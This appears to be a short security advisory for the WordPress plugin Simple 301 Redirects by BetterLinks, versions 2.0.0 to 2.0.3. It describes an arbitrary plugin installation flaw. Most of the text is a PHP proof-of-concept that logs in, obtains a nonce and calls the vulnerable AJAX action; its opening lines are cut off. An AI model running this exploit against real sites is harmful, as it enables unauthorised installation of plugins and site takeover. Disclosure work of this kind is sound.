Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Installation

A lack of capability checks and insufficient nonce check on the AJAX action in the plugin, made it possible for authenticated users to install arbitrary plugins on vulnerable sites.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); echo ‘Getting REST API Nonce!’; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php?action=rest-nonce’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch); curl_close($ch); //Rest Nonce preg_match(‘/([^"]+)/’, $content, $matches); $restnonce = $matches[1]; echo $restnonce; echo ‘Installing Plugin!’; //Installing Plugin $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $siteurl . ‘/wp-admin/admin-ajax.php’ ); curl_setopt( $ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13’ ); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true ); curl_setopt( $ch, CURLOPT_POST, true ); curl_setopt( $ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘simple301redirects/admin/install_plugin’, ‘security’ => $restnonce, ‘slug’ => ‘jetpack’, ] ); $output = curl_exec($ch); curl_close($ch); print($output) ?>